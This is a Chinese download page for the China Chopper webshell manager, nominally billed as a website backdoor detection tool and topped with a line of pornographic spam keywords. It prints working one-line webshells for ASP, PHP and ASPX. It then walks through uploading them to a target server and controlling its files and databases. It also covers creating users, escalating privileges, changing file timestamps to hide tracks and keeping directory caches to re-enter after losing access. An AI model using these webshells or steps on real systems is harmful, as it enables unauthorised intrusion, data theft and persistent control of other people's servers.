亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

中國菜刀 (chopper) v1.5 網(wǎng)站后門檢測利用工具

中國菜刀

  • 軟件大小:1.21MB
  • 軟件語言:簡體中文
  • 軟件類型:國產(chǎn)軟件
  • 軟件授權(quán):免費軟件
  • 軟件類別:掃瞄攻擊
  • 應(yīng)用平臺:Windows平臺
  • 更新時間:2024-11-11
  • 網(wǎng)友評分:
360通過 騰訊通過 金山通過

情介紹

中國菜刀 (chopper)  是國內(nèi)牛人開發(fā)的方便的檢測后門是否可以利用,方便站長做網(wǎng)站安全檢測。最近有好心的朋友提供了我們的一些不維護網(wǎng)站的存在注入問題的幾個頁面,正好用這個工具檢測了下, 要不是服務(wù)器安全設(shè)置好了, 否則什么都是別人的了。

解壓密碼:okjb51

如果你是站長,你還在用FTP來管理你的網(wǎng)站嗎?
為什么不試一下“中國菜刀”呢,這是一款專業(yè)的網(wǎng)站管理工具。
用途廣泛,使用方便,小巧實用。
同時,還能連接管理幾乎所有主流的數(shù)據(jù)庫。
支持的網(wǎng)站腳本有:PHP,ASP.NET,ASP, 后續(xù)將支持其它網(wǎng)站腳本的連接管理。
其它功能:WEB瀏覽器(POST瀏覽/自定義COOKIE瀏覽/自定義JS),網(wǎng)站爬行(自動保存目錄結(jié)構(gòu)),WEB安全掃描。
在非簡體中文環(huán)境下使用,自動切換到英文界面。

說起菜刀,就不得不提起菜刀的作者,作者是一個退伍軍人,生長在一個貧窮的農(nóng)村,據(jù)說初中也沒讀完,英語更是不咋地,但他卻自學(xué)掌握了
C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand等等,當(dāng)初在六七年前臺灣鬧獨立的時候,他在國民黨和民進黨的網(wǎng)站上留下了“只有一個中國”的黑頁,一舉成名。
作者是一個樸實,低調(diào)的技術(shù)牛人,他這些年留下的作品很多,中國菜刀是他最新的一個作品,從他之前的作品WEBSHELL管理器的基礎(chǔ)上修改而來,功能更加的強大。
你見過很強大的ASP后門,很強大的PHP后門,很強大的ASPX后門,那你見過很強大的asp,aspx,php三合一后門么........,沒有吧,尤其是這個后門,只有一句話。
Asp環(huán)境:<%eval request("a")%>
Php環(huán)境:<?php @eval($_POST['a']);?>
Aspx環(huán)境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>

是不是很震憾,很不可思議,是的,我剛接觸的時候,也是這樣的想法,就這三句話,一個名不見經(jīng)傳的“中國菜刀”,就可以代替我那搜集了幾年,大大小小幾百個多種平臺多種環(huán)境的腳本后門?,事實證明,我錯了,原來“中國菜刀”不僅僅可以代替那些后門,而且他的功能超出我的想象,就讓我慢慢說明吧。
1.就從最基本的講起,你的腳本是不是經(jīng)常被殺,你怎么變形都被殺,,傳到服務(wù)器被殺導(dǎo)致被管理員發(fā)現(xiàn),結(jié)果你的權(quán)限就沒了,殺到你欲哭無淚。菜刀的一句話后門,可以避免這個問題,只有短短的一行代碼,永遠不會被查殺。
2.你是不是很郁悶?zāi)愕暮箝T傳到服務(wù)器上連他媽都不認識了,框架變形,字體變框框,點擊菜單無效,這個是因為系統(tǒng)語言不兼容造成的,菜刀是UINCODE方式編譯,支持多國語言輸入顯示,完全不存在兼容性問題。
3.你是不是有很多webshell,你每次都拿記事本記下來,需要的時候,又去翻半天,弄得你很累很沒脾氣。有了“菜刀”,你可以很方便管理你的webshell,所有的記錄都保存在加密的本地數(shù)據(jù)庫里,而且支持webshell分類,讓你管理得井井有條。菜刀不僅有臨時鎖定功能,方便你離開電腦的那小會時間不被別人偷你的webshell,也有加密功能,不輸對密碼,HOHO,偷了你的數(shù)據(jù)也沒用。
4.再來說說數(shù)據(jù)庫管理,這個是菜刀最最強大的功能,精通各平臺主流數(shù)據(jù)庫的作者,把這個功能寫的是淋漓盡致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等數(shù)據(jù)庫,支持不是最主要的,功能強大,人性化才是最主要的,“菜刀”的數(shù)據(jù)庫操作界面,內(nèi)置了常用的數(shù)據(jù)庫語句,非常直觀的表列名瀏覽功能,自動顯示表名,列名,查詢語句,非常人性化的設(shè)計,更內(nèi)置了不少自建的函數(shù),方便不懂?dāng)?shù)據(jù)庫的菜鳥,都能查閱數(shù)據(jù)庫里的數(shù)據(jù),再說個“菜刀”數(shù)據(jù)庫管理的一個小技巧,對于access數(shù)據(jù)庫,可以在菜刀的webshell操作界面,對著MDB文件點右鍵,點Access Management,就直接進入Access的數(shù)據(jù)庫操作界面了,方便吧,嘿嘿??!
5.再說說提權(quán)這塊,webshell的提權(quán)總是最讓人關(guān)心的,說到提權(quán),就不能說到webshell上的cmd執(zhí)行了,有些朋友并不了解菜刀的自定義CMD路徑功能,有兩種方法可以設(shè)置指定的cmd路徑,一就是在cmd操作界面,輸入setp d:\cmd.exe,就可以了,或者把cmd.exe上傳到目錄,然后點右鍵,點virtual terminal file,就可以進入自定義CMD.EXE路徑的命令行了,同樣的,再給個cmd使用的小技巧,在菜刀的命令行里,可以使用cd等命令跳轉(zhuǎn)目錄,方便吧,嘿嘿??!嗯,另外,新版菜刀新增常用目錄管理功能,你可以把你常用的目錄或者提權(quán)的目錄加進菜刀里,這樣很方便你提權(quán)或者日常工作,是不是比那些固定了提權(quán)目錄的腳本后門要牛B的多啊,哈哈。
6.還有菜刀的webshell上的文件功能功能,也是非常人性化的,文件夾和文件的圖標(biāo)完全模枋windows,,文件日期,文件大小,文件權(quán)限,一目了然,尤其是修改文件時間功能,非常的方便,直接對著要修改時間的文件點右鍵,modify the file time,然后在文件的時間那欄,輸入時間,回車,就修改完了。當(dāng)然,菜刀的文件管理還有新建,刪除,上傳,下載,編輯功能,這些大同小異,就不一一細說了。不過有個功能,還是要重點說明的,那就是目錄緩存功能,菜刀可以把瀏覽過的webshell目錄都緩存在本地,這樣可以方便下次訪問的時候更加快捷,最重要的是,當(dāng)哪天你的權(quán)限丟了,起碼你還有對方服務(wù)器的文件目錄結(jié)構(gòu),方便再一次滲透。
說完大家都有的腳本后門功能,現(xiàn)在來說點特別的菜刀功能,非常特別跟實用的哦。菜刀的前身是WEBSHELL管理器,再結(jié)合了作者之前的web管理軟件等幾個工具的優(yōu)點,實在是大殺器的集合體。

使用方法

這里以php為例
首先我們先將php一句話木馬上傳到目標(biāo)服務(wù)器中,用菜刀去嘗試連接

在地址中填寫上傳一句話木馬的地址,在后面的方框中填寫所要連接的參數(shù)(也就是代碼中的’x’)

打開菜刀,空白處右鍵添加

設(shè)置好后我們雙擊點開

填入地址、密碼 等參數(shù)

添加完成之后就可以對目標(biāo)服務(wù)器進行控制,可以對文件進行相關(guān)的操作,也可以對數(shù)據(jù)庫進行操作,也可以創(chuàng)建一個用戶。

我們將a.txt刪除,然后去服務(wù)器上查看,發(fā)現(xiàn)服務(wù)器上的a.txt文件也被刪除了,這就是利用了上傳漏洞進行攻擊。

更新日志

最新版本1.5,官方已經(jīng)無法訪問,建議再虛擬機中執(zhí)行,以防止有后門。

載地址

下載錯誤?【投訴報錯】

中國菜刀 (chopper) v1.5 網(wǎng)站后門檢測利用工具

      氣軟件

      關(guān)文章

      載聲明

      ☉ 解壓密碼:chabaoo.cn 就是本站主域名,希望大家看清楚,[ 分享碼的獲取方法 ]可以參考這篇文章
      ☉ 推薦使用 [ 迅雷 ] 下載,使用 [ WinRAR v5 ] 以上版本解壓本站軟件。
      ☉ 如果這個軟件總是不能下載的請在評論中留言,我們會盡快修復(fù),謝謝!
      ☉ 下載本站資源,如果服務(wù)器暫不能下載請過一段時間重試!或者多試試幾個下載地址
      ☉ 如果遇到什么問題,請評論留言,我們定會解決問題,謝謝大家支持!
      ☉ 本站提供的一些商業(yè)軟件是供學(xué)習(xí)研究之用,如用于商業(yè)用途,請購買正版。
      ☉ 本站提供的中國菜刀 (chopper) v1.5 網(wǎng)站后門檢測利用工具資源來源互聯(lián)網(wǎng),版權(quán)歸該下載資源的合法擁有者所有。